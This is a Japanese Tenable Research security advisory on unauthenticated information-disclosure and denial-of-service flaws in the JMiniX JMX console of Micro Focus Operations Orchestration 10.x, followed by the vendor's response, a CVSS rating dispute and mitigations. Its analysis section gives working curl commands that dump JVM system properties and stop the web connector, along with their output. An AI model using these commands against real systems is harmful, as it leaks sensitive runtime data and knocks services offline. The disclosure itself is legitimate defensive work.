Tenable ブログ
ブログ通知を受信するTenable Researchアドバイザリー:Micro Focus Operations Orchestration、リモートサービス拒否(DoS)脆弱性
Tenable ResearchがMicro Focus Operations Orchestrationソフトウェアにおける情報漏えいとサービス拒否の脆弱性に関するアドバイザリーをリリースしました。
この投稿では、発見された脆弱性に関する詳細なコンテキストを提供します。
知る必要のある事柄は?Tenable Researchは、Micro Focus Operations Orchestrationバージョン10.Xの情報開示およびサービス拒否の脆弱性を発見しました。これらは、重要なランタイム情報を開示し、管理用Webベースのアクセスに使用されるJMiniX JMXコンソールをシャットダウンするために使用できます。
攻撃経路とは?悪用にはリモートの未認証ネットワークアクセスが必要で、簡単に悪用できます。
事業影響度は?悪意のある攻撃者は、偵察のため重要なランタイム情報を収集できます。さらに深刻なことに、ウェブユーザーインターフェイスへのアクセスを提供するJMiniX JMXコンソールをリモートからシャットダウンできます。Micro Focus Operations Orchestrationは、インシデントや災害の復旧、ハイブリッドクラウドのプロビジョニングと構成などのITプロセスを自動化するために、ITチームやDevOps運用チームにより使用されています。
ソリューションは?Micro Focusはソフトウェア更新とアドバイザリーをリリースしました。影響を受けるユーザーは可能な限り早急にパッチを適用する必要があります。
背景
Micro FocusとHPE Softwareは2017 年に合併し、HPE Operations OrchestratorはMicro Focus Operations Orchestratorという社名に変更されました。
Micro Focus Operations Orchestratorは、Micro Focusのハイブリッドクラウド管理(HCM)と、エンドツーエンドITプロセス自動化用の他のITOMスイートのコンポーネントです。通常は、インシデントや災害の復旧、ハイブリッドクラウドのプロビジョニングと構成のプロセスやタスクを自動化するために大企業で使用されます。
分析
Operations Orchestrationのデフォルト構成では、JMiniXJMXコンソールが未認証のリモートユーザーにさらされています。悪意のある攻撃者は、このコンソールを使用して情報を収集するおそれがあります。
必要なのは、アプリケーションに対するリモートネットワークアクセスだけです。悪用が(curlなどを使用して)簡単に生じます。
情報開示
以下に、重要なランタイム情報を漏えいさせるためにアプリケーションに問い合わせる方法を示す例を記します。
albinolobster@ubuntu:~$ curl -d "executed=true" -X POST http://192.168.1.253:8080/oo/jminix/servers/0/domains/com.sun.management/mbeans/type=DiagnosticCommand/operations/vmSystemProperties%28%29/
#Wed Feb 28 11:01:57 EST 2018
java.vendor=Azul Systems, Inc.
events.persistency=false
org.apache.xml.security.ignoreLineBreaks=true
sun.java.launcher=SUN_STANDARD
catalina.base=C\:/Program Files/Hewlett Packard Enterprise/HPE Operations Orchestration/central/tomcat
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Windows 10
sun.boot.class.path=C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\resources.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\rt.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\sunrsasign.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jsse.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jce.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\charsets.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jfr.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\classes
ssl.verifyHostName=false
host.name=DESKTOP-F6M1S7H.westeros
cloudslang.worker.inBufferCapacity=200
mgmt.url=http\://localhost\:8080/oo
sun.desktop=windows
java.vm.specification.vendor=Oracle Corporation
java.runtime.version=1.8.0_66-b17
wrapper.native_library=wrapper
javax.net.ssl.keyStore=C\:/Program Files/Hewlett Packard Enterprise/HPE Operations Orchestration/central/var/security/certificate.p12
wrapper.key=mmvkDoBqly1UnneD13IinG_K5LF_5nhg
user.name=DESKTOP-F6M1S7H$
... snip ...
サービス拒否
下の例の場合、ウェブインターフェイスをシャットダウンさせ、サービス拒否を引き起こしています。
albinolobster@ubuntu:~$ curl -d "executed=true" -X POST http://192.168.1.253:8080/oo/jminix/servers/0/domains/Catalina/mbeans/type=Connector,port=8080/operations/stop%28%29/
curl: (52) Empty reply from server
albinolobster@ubuntu:~$ curl -vv http://192.168.1.253:8080/oo/
* Trying 192.168.1.253...
* TCP_NODELAY set
* Connected to 192.168.1.253 (192.168.1.253) port 8080 (#0)
> GET /oo/ HTTP/1.1
> Host: 192.168.1.253:8080 > User-Agent: curl/7.54.0 > Accept: */* > ^C
ベンダー応答
Micro Focus社はソフトウェア更新と関連するアドバイザリー、MFSBGN03801 rev.1を 2018年3月1日にリリースしました。
CVSS評価に関する注記:Micro FocusはAC:H(アクセスの複雑さ:高)と評価しました。アクセスの複雑さ「低」は次のように説明されています。
特別なアクセス条件、酌量すべき状況は存在しない。例を示します。
- 通常、影響を受ける製品は広範なシステムとユーザーへのアクセスを必要とします。それには、匿名や信頼されていないシステムやユーザーも含まれる場合があります(インターネット接続しているウェブサーバーやメールサーバーなど)。
- 影響を受ける設定はデフォルトまたはユビキタスです。
- 攻撃は手動で実行でき、スキルや他の情報を収集する必要はほとんどありません。
- ゆるい競合状態です(つまり、厳密には競合ですが、簡単に勝者になれます)。
影響を受ける設定はデフォルト設定です。Tenable CVSS評価はこの点を反映しています。Micro Focusの評価には反映されていません。Tenable ResearchがMITREに通知済みです。
事業影響度
悪意のある攻撃者は重要なランタイム情報を収集し、さらに攻撃を行うための偵察データを集めることができます。
さらに危惧するべき点として、悪意のある攻撃者は、Webユーザーインターフェイスへのアクセスを提供するJMiniX JMXコンソールをリモートからシャットダウンすることができます。また、攻撃者はサービス拒否の攻撃を繰り返すことにより、運用の整合性に悪影響を与える可能性があります。他の攻撃手段(ランサムウェア攻撃など)と組み合わせられると、災害やインシデントの復旧手段に影響が及ぶ可能性があります。
ソリューション
- Micro Focusから提供されるソフトウェア更新をできる限り早急に適用してください。
- 攻撃の影響を緩和する回避策として、ネットワークアクセスを権限のあるユーザーのみに限定しましょう。
- Tenableは、次の脆弱性を検出するプラグインをリリースしました: プラグインID107094 Micro Focus Operations Orchestration JMiniX の複数の脆弱性
関連記事
- Plugins